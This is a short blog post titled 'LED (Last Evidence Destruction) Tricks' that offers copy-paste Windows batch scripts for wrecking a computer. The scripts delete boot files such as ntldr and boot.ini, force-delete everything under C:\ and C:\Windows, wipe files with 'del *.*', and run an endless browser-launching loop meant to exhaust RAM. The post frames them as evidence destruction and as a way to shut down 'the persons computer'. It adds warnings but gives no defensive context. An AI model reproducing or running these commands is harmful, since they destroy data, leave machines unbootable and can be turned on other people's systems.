LED ( Last Evidence Destruction ) Tricks - The Info Guy | Dashing tips & Smashing tricks

Breaking


Sunday 6 October 2019

LED ( Last Evidence Destruction ) Tricks











How To Shut Down Your Laptop Forever

In case of emergency, I have always had this in my flash drive and it has helped me countless times
Now Please don’t try this because this is the most simplest and deadliest hack for your windows computer.



Copy the following code into your notepad

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Save it as “shutdown-forever.bat”. Just make sure it has a .bat or .cmd extension.



DON'T EVEN THINK ABOUT RUNNING THE .BAT FILE, ALL YOUR FILES GONE FOR GOOD


This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.So please, use this trick only if you have no intention of rebooting your computer again. So just be careful.

Here’s an alternative code.

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q

Paste it in Note Pad And Save It with Extension .cmd or .bat.


How to Delete All System Files With A Small Command



Copy the following code into your notepad and save it as a .bat file.

del *.*

All your files in your hard disk will vanish in less than 5mins.


 Crash Your RAM



open notepad and type

:A
start www.brainrex.blogspot.com
goto A

save with .bat extension.
Infinitely loops your browser to open up 
brainrex.blogspot.com





Try Them At Your Own Risk, I Am Not Responsible For Loss Of Data. OYO Bro 

No comments:

Post a Comment